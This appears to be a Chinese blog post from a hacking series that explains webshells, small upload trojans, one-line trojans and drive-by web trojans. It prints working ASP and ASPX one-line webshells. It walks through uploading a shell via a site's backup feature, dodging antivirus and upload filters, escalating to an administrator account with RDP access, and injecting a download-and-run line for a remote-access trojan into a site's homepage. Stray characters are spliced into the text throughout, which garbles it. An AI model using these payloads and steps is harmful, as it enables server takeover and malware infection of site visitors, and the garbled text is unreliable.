? 二話不說坊罢,直接正文胸蛛!
? 對于大多數(shù)人來說兴喂,木馬病毒是具有破壞功能的程序罷了趟佃。但為了達到不同的功能轧坎,在實際應(yīng)用情況中恩溅,它們又各有各自的功用造锅。其實原献,許多軟件程序并不帶有破壞的能力态坦,而他們所具有的強大功能盐数,使得殺軟公司不得不將他們列入黑名單中。接下來伞梯,我就為大家講講在web滲透攻擊中玫氢,常常用到的那些“寵物”帚屉。
webshell
? 它是基于網(wǎng)絡(luò)管理員為了方便網(wǎng)站和服務(wù)器間的管理,以網(wǎng)頁文本形式存在的命令行形式的執(zhí)行環(huán)境漾峡。通過webshell我們無法直接瀏覽網(wǎng)頁效果攻旦,它以文件和文件夾形式向管理員展示。通過webshell我們可以清楚地看到文件中的源代碼生逸,并根據(jù)自己的需要進行修改牢屋。以及看到服務(wù)器對應(yīng)開啟的端口和服務(wù),包括服務(wù)器上所安裝的軟件槽袄。當然烙无,在實際情況中,管理員為了不讓破壞者可以隨意修改服務(wù)器上的文件內(nèi)容遍尺,通常會對其進行權(quán)限設(shè)置截酷,使得webshell僅僅具有“只讀”的權(quán)限而無法寫入內(nèi)容。一般webshell的格式通常為asp/php/jsp/cgi等等乾戏,其中asp和php是最為常見的迂苛。在這里分享一個簡單的webshell使用上傳的方法(簡述):通過我在之前講述的方法中,我們首先進入網(wǎng)站后臺歧蕉。并找到新聞或者文章發(fā)布編輯的功能灾部,我們創(chuàng)建一個新的文章,在里面上傳文件惯退,上傳你所準備好的webshell文件赌髓,之后提交上傳。這個時候記錄下你文件上傳的地址(至少在滲透測試時催跪,一個良好的習(xí)慣是隨時準備記事本記錄)锁蠕,然后找到后臺數(shù)據(jù)庫備份功能,將剛才的地址粘貼懊蒸,對你的文件進行備份功能荣倾,如果提示成功,記錄下備份成功的地址骑丸,然后在瀏覽器中打開舌仍,就可以看到你上傳的webshell,然后輸入密碼登錄就可以進去了通危。
在實際情況中铸豁,我們會遇到以下問題。文件上傳失斁盏:失敗原因很多種节芥,一般情況是服務(wù)器上有自帶的殺軟。對付這種情況,我們需要一個免殺的webshell即可头镊,一般網(wǎng)上也會有的蚣驼,自己去仔細找找。還有就是提示文件上傳格式不對相艇,其實颖杏,為了防止自己服務(wù)器被攻擊,管理員都會禁止上傳類似php/asp這樣的文件厂捞。遇到這種情況并不代表自己沒辦法了输玷,我們首先要確定服務(wù)器的類型队丝,是否是iis搭建(具體方法靡馁,可以參照sql注入里的內(nèi)容),如果是利用iis机久,我們這時候可以更改webshell的文件格式臭墨,通過上傳圖片實現(xiàn)webshell的成功上傳。而iis是過濾文件打開格式的膘盖,所以只需要在瀏覽器打開webshell的格式中更換回來就可以正常打開了胧弛。不過現(xiàn)在一般大中型網(wǎng)站不具有數(shù)據(jù)庫備份功能,所以這個簡單的方法還是具有一定的局限性的侠畔。除了可以查看文件结缚,其實最主要的功能,就是提權(quán)软棺,一般webshell自帶提權(quán)功能(有局限)红竭。成功提權(quán)后,我們就可以在webshell中打開命令行喘落,創(chuàng)建一個管理員茵宪,然后利用3389登錄服務(wù)器,這意味著你攻擊下了一臺服務(wù)器——恭喜J萜濉(雖然很理想化稀火,但對于小型網(wǎng)站足夠了) 那么對于webshell的優(yōu)劣我也不做介紹了,其實之前我也都提到了赌朋。那就介紹下一個了凰狞。(webshell大同小異,我就不特別推薦了)
小馬
? 小馬沛慢,其實和webshell一樣赡若,說是馬,其實它并不具木馬可破壞的特點颠焦。但它的所具有的小巧斩熊、隱蔽性,一直備受黑客們的喜愛伐庭。即使我們成功上傳了webshell但對于隱蔽性來說他遠遠不及小馬粉渠,所以就算入侵成功也很可能被管理員在服務(wù)器上刪除分冈,但小馬體積小,方便隱藏霸株,所以我們會利用小馬來上傳我們的大馬(webshell的一個諢名)雕沉,大小馬搭配天衣無縫。這也就是小馬的功能去件,上傳文件F陆贰(它沒別的功能了,所以和大馬需要做到搭配使用)一般小馬的使用和上傳和之前webshell說到的方法一模一樣尤溜,也可以用備份功能倔叼。
將文件利用記事本功能打開,將內(nèi)容復(fù)制粘貼到小馬里宫莱,然后創(chuàng)建一個文件名上傳丈攒,提示成功后就可以使用了。但在這里我要為大家推薦一種特別的小馬——一句話木馬授霸。一句話木馬聽上去高深莫測巡验,僅僅一句話就是木馬,但實際情況是這一句話正是SQL注入中提到的SQL語句罷了碘耳。我們通過使用的SQL語句注入到數(shù)據(jù)庫中(可以留言到留言板或者發(fā)文章等等方法)显设,然后利用一句話木馬的客戶端連接即可。在客戶端中辛辨,我們需要輸入數(shù)據(jù)庫地址(方法在前面SQL注入中有提到)捕捂,然后鍵入自己要提交的內(nèi)容后,然后連接數(shù)據(jù)庫提交就可以了愉阎。這時候如果成功绞蹦,記錄下上傳地址后打開即可。
常用一句話木馬
asp一句話木馬:
<%execute(request("value"))%>
aspx一句話木馬:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
PHP的一句話簡書給我過濾了...感興趣的話自己去網(wǎng)上百度一下就可以了榜旦。
這里我推薦中國菜刀和桂林老兵的一句話木馬幽七,當然它們兩者功能不僅僅于此。
網(wǎng)馬
我們經(jīng)常會聽到什么網(wǎng)站被掛馬攻擊了溅呢,嚇得我們也不敢去該網(wǎng)頁瀏覽自己需要的內(nèi)容澡屡。但是所謂的網(wǎng)馬又究竟是什么呢?這里的網(wǎng)馬其實有別于之前提到的大小馬咐旧,它是真正具有破壞能力的木馬驶鹉,還記得我在溢出攻擊中提到的灰鴿子嗎?這里的網(wǎng)馬可以是它铣墨!網(wǎng)馬的生成其實很簡單室埋,首先成功生成一個灰鴿子(還是我之前提到的內(nèi)容),然后一個網(wǎng)馬生成器。如果你的灰鴿子木馬是放在一個FTP服務(wù)器上的姚淆,那么在網(wǎng)馬生成器中鍵入這個地址孕蝉,然后本地上傳木馬(根據(jù)具體情況)點擊確定生成就可以了,就這么簡單腌逢,沒了降淮!你也可以利用免費空間上傳。
然后我們會得到一行代碼搏讶,我們復(fù)制這行代碼佳鳖,然后利用webshell在網(wǎng)站首頁或者非首頁中(一般為index文件是首頁地址),找到合適的位置(不破壞首頁結(jié)構(gòu))然后粘貼即可媒惕。它的原理是系吩,當計算機瀏覽該網(wǎng)頁時,讀到這行代碼的時候吓笙,它會根據(jù)提供的地址去索引淑玫,然后根據(jù)這個地址去下載并執(zhí)行巾腕,這時候我們的灰鴿子客戶端就會提示主機上線了面睛!這就是網(wǎng)馬的使用,不過還是強烈建議要做到免殺尊搬,畢竟現(xiàn)在基本上計算機上都會裝個免費的360.
? 這周更新的速度有點慢叁鉴。最近有點忙,如果沒有及時更新佛寿,我也會在后面補齊的幌墓,希望大家理解。這次的內(nèi)容雖然是對“寵物”介紹冀泻,而實際上我們會發(fā)現(xiàn)它們的使用和之前所提到的內(nèi)容有著緊密關(guān)系常侣,也希望大家多去實踐,才能做到駕輕就熟弹渔。當然實踐前提是不給他人帶來不便胳施,若造成了涉及法律的問題,筆者不承擔任何法律責(zé)任肢专。
謝謝大家一如既往的支持舞肆,每周更新!